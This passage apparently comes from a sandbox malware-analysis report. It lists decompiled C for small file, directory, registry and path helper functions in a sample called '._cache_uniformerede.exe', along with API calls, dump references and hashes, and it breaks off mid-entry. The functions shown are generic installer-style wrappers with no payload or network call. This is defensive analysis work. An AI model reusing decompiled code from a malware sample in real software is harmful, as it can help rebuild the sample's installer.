                                                                                                                                                                                                                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                                                                            0x0040615c
                                                                                                                                                                                                                            0x00406169
                                                                                                                                                                                                                            0x0040617e
                                                                                                                                                                                                                            0x00406184

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 0040615C
                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                                                                                                                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                                                                                                            0x00406138
                                                                                                                                                                                                                            0x0040613e
                                                                                                                                                                                                                            0x00406143
                                                                                                                                                                                                                            0x0040614c
                                                                                                                                                                                                                            0x0040614c
                                                                                                                                                                                                                            0x00406155

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                                                                            0x00405c1c
                                                                                                                                                                                                                            0x00405c24
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405c2a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C2A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                                                                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                                                                                                                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402DA6(0xffffffd0);
				_t16 = E00402DA6(0xffffffdf);
				E00402DA6(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E0040699E(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00406428(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                                                                                                                                                                                            0x00401684
                                                                                                                                                                                                                            0x0040168d
                                                                                                                                                                                                                            0x0040168f
                                                                                                                                                                                                                            0x00401696
                                                                                                                                                                                                                            0x0040169e
                                                                                                                                                                                                                            0x004016aa
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x004016be
                                                                                                                                                                                                                            0x004016c0
                                                                                                                                                                                                                            0x004016c5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004016c5
                                                                                                                                                                                                                            0x004016a0
                                                                                                                                                                                                                            0x004016a0
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMove
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3562171763-0
                                                                                                                                                                                                                            • Opcode ID: 26fbc70d2e8597573122cea31dc6bfba5e45494ce0a55dbc8012e9dd9e1a121d
                                                                                                                                                                                                                            • Instruction ID: be669950fb77a2d656db840ba494943e65029fea8fad8f9acd4f4e8736b9b328
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26fbc70d2e8597573122cea31dc6bfba5e45494ce0a55dbc8012e9dd9e1a121d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0BB31A08120E7CB11BBB55F4DE5E2154DF83364F24023FF011B11D1D9BDC95255AE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                                                                                                                                                                            0x004023b2
                                                                                                                                                                                                                            0x004023b2
                                                                                                                                                                                                                            0x004023b4
                                                                                                                                                                                                                            0x004023b8
                                                                                                                                                                                                                            0x004023bb
                                                                                                                                                                                                                            0x004023c0
                                                                                                                                                                                                                            0x004023c5
                                                                                                                                                                                                                            0x004023ce
                                                                                                                                                                                                                            0x004023ce
                                                                                                                                                                                                                            0x004023d3
                                                                                                                                                                                                                            0x004023dc
                                                                                                                                                                                                                            0x004023dc
                                                                                                                                                                                                                            0x004023e9
                                                                                                                                                                                                                            0x004015b4
                                                                                                                                                                                                                            0x004015b6
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x0040292e
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                                                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                                                            0x0040650d
                                                                                                                                                                                                                            0x00406516
                                                                                                                                                                                                                            0x0040652c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040652c
                                                                                                                                                                                                                            0x0040651a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                                                            • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t11;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t11 = _t8;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                                                                                                                                                                                            0x00401749
                                                                                                                                                                                                                            0x0040174f
                                                                                                                                                                                                                            0x00401751
                                                                                                                                                                                                                            0x004028fc
                                                                                                                                                                                                                            0x00402903
                                                                                                                                                                                                                            0x00402903
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PathSearch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2203818243-0
                                                                                                                                                                                                                            • Opcode ID: ba1aa4db5ad6b1f18ee88ff5d2f1afd4f8bab62d038d97b8ecfeb07e8d8821a1
                                                                                                                                                                                                                            • Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba1aa4db5ad6b1f18ee88ff5d2f1afd4f8bab62d038d97b8ecfeb07e8d8821a1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                                            0x0040620e
                                                                                                                                                                                                                            0x0040621e
                                                                                                                                                                                                                            0x00406226
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040622d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040622f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D704,0040CEF0,00403579,0040CEF0,0040D704,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                                            0x004061df
                                                                                                                                                                                                                            0x004061ef
                                                                                                                                                                                                                            0x004061f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004061fe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406200

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                            • String ID:
